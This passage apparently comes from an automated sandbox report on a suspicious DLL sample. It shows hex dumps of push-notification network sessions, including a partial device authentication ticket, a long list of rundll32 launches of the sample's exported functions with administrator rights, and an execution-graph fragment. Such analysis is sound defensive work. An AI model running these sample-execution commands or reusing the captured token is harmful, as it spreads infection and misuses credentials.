                            Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: WY28WWlJH0W6dcYL.2Context: 39dc272911652de9<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAZcB2ZhkpVDhqCXM/AhcgkOxCTJjEFudgJ5fF8HecRn+WT2T47zmcwQbbCl794WABHqrEZgtFq5SnPhtKAJQMF+yWdJlPdvrlmZihr4rO7KNbb
                            2024-07-25 15:56:22 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 57 59 32 38 57 57 6c 4a 48 30 57 36 64 63 59 4c 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 33 39 64 63 32 37 32 39 31 31 36 35 32 64 65 39 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                            Data Ascii: BND 3 CON\WNS 0 197MS-CV: WY28WWlJH0W6dcYL.3Context: 39dc272911652de9<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            17 | 192.168.2.6 | 49727 | 40.113.110.67 | 443 | 2144 | C:\Windows\SysWOW64\rundll32.exe
                            Timestamp | Bytes transferred | Direction | Data
                            2024-07-25 15:56:22 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                            Data Ascii: 202 1 CON 58
                            2024-07-25 15:56:22 UTC58INData Raw: 4d 53 2d 43 56 3a 20 54 6e 4c 6e 62 38 36 6a 7a 55 4b 67 44 62 56 38 37 50 45 58 72 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                            Data Ascii: MS-CV: TnLnb86jzUKgDbV87PEXrw.0Payload parsing failed.


                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                            18 | 192.168.2.6 | 49731 | 40.115.3.253 | 443
                            Timestamp | Bytes transferred | Direction | Data
                            2024-07-25 15:56:51 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 31 67 53 7a 47 33 44 30 4a 30 6d 76 77 35 31 33 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 34 64 39 32 61 37 62 65 61 65 32 30 61 35 38 0d 0a 0d 0a
                            Data Ascii: CNT 1 CON 305MS-CV: 1gSzG3D0J0mvw513.1Context: 94d92a7beae20a58
                            2024-07-25 15:56:51 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                            Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                            2024-07-25 15:56:51 UTC1064OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 31 67 53 7a 47 33 44 30 4a 30 6d 76 77 35 31 33 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 34 64 39 32 61 37 62 65 61 65 32 30 61 35 38 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 5a 63 42 32 5a 68 6b 70 56 44 68 71 43 58 4d 2f 41 68 63 67 6b 4f 78 43 54 4a 6a 45 46 75 64 67 4a 35 66 46 38 48 65 63 52 6e 2b 57 54 32 54 34 37 7a 6d 63 77 51 62 62 43 6c 37 39 34 57 41 42 48 71 72 45 5a 67 74 46 71 35 53 6e 50 68 74 4b 41 4a 51 4d 46 2b 79 57 64 4a 6c 50 64 76 72 6c 6d 5a 69 68 72 34 72 4f 37 4b 4e 62 62
                            Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: 1gSzG3D0J0mvw513.2Context: 94d92a7beae20a58<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAZcB2ZhkpVDhqCXM/AhcgkOxCTJjEFudgJ5fF8HecRn+WT2T47zmcwQbbCl794WABHqrEZgtFq5SnPhtKAJQMF+yWdJlPdvrlmZihr4rO7KNbb
                            2024-07-25 15:56:51 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 31 67 53 7a 47 33 44 30 4a 30 6d 76 77 35 31 33 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 34 64 39 32 61 37 62 65 61 65 32 30 61 35 38 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                            Data Ascii: BND 3 CON\WNS 0 197MS-CV: 1gSzG3D0J0mvw513.3Context: 94d92a7beae20a58<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            19 | 192.168.2.6 | 49731 | 40.115.3.253 | 443 | 2144 | C:\Windows\SysWOW64\rundll32.exe
                            Timestamp | Bytes transferred | Direction | Data
                            2024-07-25 15:56:51 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                            Data Ascii: 202 1 CON 58
                            2024-07-25 15:56:51 UTC58INData Raw: 4d 53 2d 43 56 3a 20 50 4c 31 55 4a 53 71 6a 54 55 79 45 75 63 47 52 43 54 4f 2b 62 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                            Data Ascii: MS-CV: PL1UJSqjTUyEucGRCTO+bQ.0Payload parsing failed.



                            Target ID:0
                            Start time:11:54:11
                            Start date:25/07/2024
                            Path:C:\Windows\System32\loaddll32.exe
                            Wow64 process (32bit):true
                            Commandline:loaddll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll"
                            Imagebase:0x3a0000
                            File size:126'464 bytes
                            MD5 hash:51E6071F9CBA48E79F10C84515AAE618
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:false

                            Target ID:1
                            Start time:11:54:11
                            Start date:25/07/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:false

                            Target ID:3
                            Start time:11:54:11
                            Start date:25/07/2024
                            Path:C:\Windows\SysWOW64\cmd.exe
                            Wow64 process (32bit):true
                            Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",#1
                            Imagebase:0x1c0000
                            File size:236'544 bytes
                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:4
                            Start time:11:54:11
                            Start date:25/07/2024
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe C:\Users\user\Desktop\LisectAVT_2403002B_14.dll,GnrkBltvkx
                            Imagebase:0x4d0000
                            File size:61'440 bytes
                            MD5 hash:889B99C52A60DD49227C5E485A016679
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:5
                            Start time:11:54:11
                            Start date:25/07/2024
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",#1
                            Imagebase:0x4d0000
                            File size:61'440 bytes
                            MD5 hash:889B99C52A60DD49227C5E485A016679
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:6
                            Start time:11:54:14
                            Start date:25/07/2024
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe C:\Users\user\Desktop\LisectAVT_2403002B_14.dll,GnrkBmoaar
                            Imagebase:0x4d0000
                            File size:61'440 bytes
                            MD5 hash:889B99C52A60DD49227C5E485A016679
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:7
                            Start time:11:54:17
                            Start date:25/07/2024
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe C:\Users\user\Desktop\LisectAVT_2403002B_14.dll,GnrkCyrpw
                            Imagebase:0x4d0000
                            File size:61'440 bytes
                            MD5 hash:889B99C52A60DD49227C5E485A016679
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:8
                            Start time:11:54:22
                            Start date:25/07/2024
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkBltvkx
                            Imagebase:0x4d0000
                            File size:61'440 bytes
                            MD5 hash:889B99C52A60DD49227C5E485A016679
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:9
                            Start time:11:54:22
                            Start date:25/07/2024
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkBmoaar
                            Imagebase:0x4d0000
                            File size:61'440 bytes
                            MD5 hash:889B99C52A60DD49227C5E485A016679
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:10
                            Start time:11:54:22
                            Start date:25/07/2024
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkCyrpw
                            Imagebase:0x4d0000
                            File size:61'440 bytes
                            MD5 hash:889B99C52A60DD49227C5E485A016679
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:11
                            Start time:11:54:22
                            Start date:25/07/2024
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkZtdij
                            Imagebase:0x4d0000
                            File size:61'440 bytes
                            MD5 hash:889B99C52A60DD49227C5E485A016679
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:12
                            Start time:11:54:22
                            Start date:25/07/2024
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkZewk
                            Imagebase:0x4d0000
                            File size:61'440 bytes
                            MD5 hash:889B99C52A60DD49227C5E485A016679
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:13
                            Start time:11:54:22
                            Start date:25/07/2024
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkXzwnp
                            Imagebase:0x4d0000
                            File size:61'440 bytes
                            MD5 hash:889B99C52A60DD49227C5E485A016679
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:14
                            Start time:11:54:22
                            Start date:25/07/2024
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkXalbb
                            Imagebase:0x4d0000
                            File size:61'440 bytes
                            MD5 hash:889B99C52A60DD49227C5E485A016679
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:15
                            Start time:11:54:22
                            Start date:25/07/2024
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkWyey
                            Imagebase:0x4d0000
                            File size:61'440 bytes
                            MD5 hash:889B99C52A60DD49227C5E485A016679
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:16
                            Start time:11:54:22
                            Start date:25/07/2024
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkWtlrh
                            Imagebase:0x4d0000
                            File size:61'440 bytes
                            MD5 hash:889B99C52A60DD49227C5E485A016679
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:17
                            Start time:11:54:22
                            Start date:25/07/2024
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkWsnq
                            Imagebase:0x4d0000
                            File size:61'440 bytes
                            MD5 hash:889B99C52A60DD49227C5E485A016679
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:18
                            Start time:11:54:22
                            Start date:25/07/2024
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkWapq
                            Imagebase:0x4d0000
                            File size:61'440 bytes
                            MD5 hash:889B99C52A60DD49227C5E485A016679
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:19
                            Start time:11:54:22
                            Start date:25/07/2024
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkVnndq
                            Imagebase:0x4d0000
                            File size:61'440 bytes
                            MD5 hash:889B99C52A60DD49227C5E485A016679
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:20
                            Start time:11:54:22
                            Start date:25/07/2024
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkUsmc
                            Imagebase:0x4d0000
                            File size:61'440 bytes
                            MD5 hash:889B99C52A60DD49227C5E485A016679
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:21
                            Start time:11:54:22
                            Start date:25/07/2024
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkTrg
                            Imagebase:0x4d0000
                            File size:61'440 bytes
                            MD5 hash:889B99C52A60DD49227C5E485A016679
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:22
                            Start time:11:54:22
                            Start date:25/07/2024
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkTjxdo
                            Imagebase:0x4d0000
                            File size:61'440 bytes
                            MD5 hash:889B99C52A60DD49227C5E485A016679
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:23
                            Start time:11:54:22
                            Start date:25/07/2024
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkTch
                            Imagebase:0x4d0000
                            File size:61'440 bytes
                            MD5 hash:889B99C52A60DD49227C5E485A016679
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:24
                            Start time:11:54:22
                            Start date:25/07/2024
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkTcfv
                            Imagebase:0x4d0000
                            File size:61'440 bytes
                            MD5 hash:889B99C52A60DD49227C5E485A016679
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:25
                            Start time:11:54:22
                            Start date:25/07/2024
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkStso
                            Imagebase:0x4d0000
                            File size:61'440 bytes
                            MD5 hash:889B99C52A60DD49227C5E485A016679
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:26
                            Start time:11:54:22
                            Start date:25/07/2024
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkSf
                            Imagebase:0x4d0000
                            File size:61'440 bytes
                            MD5 hash:889B99C52A60DD49227C5E485A016679
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:27
                            Start time:11:54:22
                            Start date:25/07/2024
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkSbq
                            Imagebase:0x4d0000
                            File size:61'440 bytes
                            MD5 hash:889B99C52A60DD49227C5E485A016679
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:28
                            Start time:11:54:22
                            Start date:25/07/2024
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkRrdcfn
                            Imagebase:0x4d0000
                            File size:61'440 bytes
                            MD5 hash:889B99C52A60DD49227C5E485A016679
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:29
                            Start time:11:54:22
                            Start date:25/07/2024
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkQulon
                            Imagebase:0x4d0000
                            File size:61'440 bytes
                            MD5 hash:889B99C52A60DD49227C5E485A016679
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:30
                            Start time:11:54:22
                            Start date:25/07/2024
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkQr
                            Imagebase:0x4d0000
                            File size:61'440 bytes
                            MD5 hash:889B99C52A60DD49227C5E485A016679
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:false

                            Target ID:31
                            Start time:11:54:22
                            Start date:25/07/2024
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkQm
                            Imagebase:0x4d0000
                            File size:61'440 bytes
                            MD5 hash:889B99C52A60DD49227C5E485A016679
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:32
                            Start time:11:54:22
                            Start date:25/07/2024
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkPp
                            Imagebase:0x4d0000
                            File size:61'440 bytes
                            MD5 hash:889B99C52A60DD49227C5E485A016679
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:33
                            Start time:11:54:22
                            Start date:25/07/2024
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkOxft
                            Imagebase:0x4d0000
                            File size:61'440 bytes
                            MD5 hash:889B99C52A60DD49227C5E485A016679
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:34
                            Start time:11:54:22
                            Start date:25/07/2024
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkOksgc
                            Imagebase:0x4d0000
                            File size:61'440 bytes
                            MD5 hash:889B99C52A60DD49227C5E485A016679
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:35
                            Start time:11:54:22
                            Start date:25/07/2024
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkOi
                            Imagebase:0x4d0000
                            File size:61'440 bytes
                            MD5 hash:889B99C52A60DD49227C5E485A016679
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:36
                            Start time:11:54:23
                            Start date:25/07/2024
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkOhqbhe
                            Imagebase:0x4d0000
                            File size:61'440 bytes
                            MD5 hash:889B99C52A60DD49227C5E485A016679
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:37
                            Start time:11:54:23
                            Start date:25/07/2024
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkOda
                            Imagebase:0x4d0000
                            File size:61'440 bytes
                            MD5 hash:889B99C52A60DD49227C5E485A016679
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:38
                            Start time:11:54:23
                            Start date:25/07/2024
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkNsdwzc
                            Imagebase:0x4d0000
                            File size:61'440 bytes
                            MD5 hash:889B99C52A60DD49227C5E485A016679
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:39
                            Start time:11:54:23
                            Start date:25/07/2024
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkNr
                            Imagebase:0x4d0000
                            File size:61'440 bytes
                            MD5 hash:889B99C52A60DD49227C5E485A016679
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:40
                            Start time:11:54:23
                            Start date:25/07/2024
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkNofovl
                            Imagebase:0x4d0000
                            File size:61'440 bytes
                            MD5 hash:889B99C52A60DD49227C5E485A016679
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:41
                            Start time:11:54:23
                            Start date:25/07/2024
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkNlqh
                            Imagebase:0x4d0000
                            File size:61'440 bytes
                            MD5 hash:889B99C52A60DD49227C5E485A016679
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                              Execution Graph

                              Execution Coverage:1.6%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:15.2%
                              Total number of Nodes:46
                              Total number of Limit Nodes:1
                              execution_graph
                              20469 6cd51770 lstrcmpiW codecvt
                              20453 6cd54eb3 VirtualAlloc
                              20399 6cd51880
                              20400 6cd5188e
                              20399 -> 20400
                              20402 6cd518bb
                              20400 -> 20402
                              20403 6cd51090
                              20400 -> 20403
                              20410 6cd51000
                              20403 -> 20410
                              20405 6cd51098
                              20414 6cd68f80
                              20405 -> 20414
                              20407 6cd510b1
                              20417 6cd6e330
                              20407 -> 20417
                              20409 6cd510bb
                              20409 -> 20402
                              20412 6cd51016
                              20410 -> 20412
                              20411 6cd51025 GetTickCount Sleep GetTickCount
                              20411 -> 20412
                              20412 -> 20411
                              20413 6cd51055
                              20412 -> 20413
                              20413 -> 20405
                              20435 6cd69e90
                              20414 -> 20435
                              20416 6cd68f88
                              20416 -> 20407
                              20418 6cd6e346
                              20417 -> 20418
                              20420 6cd6e35a
                              20418 -> 20420
                              20442 6cd53270
                              20418 -> 20442
                              20421 6cd53270 VirtualAlloc
                              20420 -> 20421
                              20422 6cd6e396
                              20420 -> 20422
                              20421 -> 20422
                              20423 6cd53270 VirtualAlloc
                              20422 -> 20423
                              20424 6cd6e3d1
                              20422 -> 20424
                              20423 -> 20424
                              20425 6cd53270 VirtualAlloc
                              20424 -> 20425
                              20426 6cd6e40e codecvt
                              20424 -> 20426
                              20425 -> 20426
                              20446 6cd53390 GetProcAddress
                              20426 -> 20446
                              20428 6cd6e49e codecvt
                              20447 6cd53390 GetProcAddress
